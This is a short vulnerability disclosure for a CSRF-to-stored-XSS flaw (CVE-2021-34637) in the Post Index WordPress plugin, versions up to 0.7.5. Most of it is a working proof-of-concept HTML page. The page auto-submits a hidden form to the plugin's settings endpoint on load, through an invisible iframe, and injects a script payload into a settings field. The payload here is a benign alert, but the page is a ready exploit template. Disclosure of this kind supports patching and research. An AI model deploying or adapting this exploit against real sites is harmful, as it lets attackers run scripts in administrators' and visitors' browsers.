Post Index <= 0.7.5 – CSRF to Stored XSS | CVE 2021-34637

Description

The Post Index WordPress plugin is vulnerable to Cross-Site Request Forgery via the OptionsPage function found in the ~/php/settings.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 0.7.5.

Proof of Concept

<!DOCTYPE html>

<html>
<head>
<meta charset="utf-8">
<title>CSRF PoC</title>
</head>

<body onload="csrfSubmit();">
<form target="dummyfrm" name="evilform" action="
http://localhost/wordpress/wp-admin/options-general.php?page=post-index"
method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="updateSettings" value="1" />
<input type="hidden" name="defaultCategory" value="" />
<input type="hidden" name="showGroupCount" value="1" />
<input type="hidden" name="pageDescription" value="" />
<input type="hidden" name="postLabel[0]" value="posts" />
<input type="hidden" name="postLabel[1]" value="one post" />
<input type="hidden" name="postLabel[2]" value=" posts" />
<input type="hidden" name="infoSeparator[0]" value="also at " />
<input type="hidden" name="infoSeparator[1]" value=", " />
<input type="hidden" name="infoSeparator[2]" value=" and " />
<input type="hidden" name="infoSeparator[3]" value="" />
<input type="hidden" name="infoLinksName[0]"
value=""><script>alert(1);</script>" />
<input type="hidden" name="infoLinksField[0]" value="hoge" />
<input type="hidden" name="submit" value="Save Changes" />
</form>
<iframe src="x" width="1" height="1" name="dummyfrm"
style="visibility:hidden"></iframe>
<script>
function csrfSubmit(){
    let submit =
HTMLFormElement.prototype["submit"].bind(document.evilform);
    submit();
}
</script>

<p>CSRF PoC</p>
</html>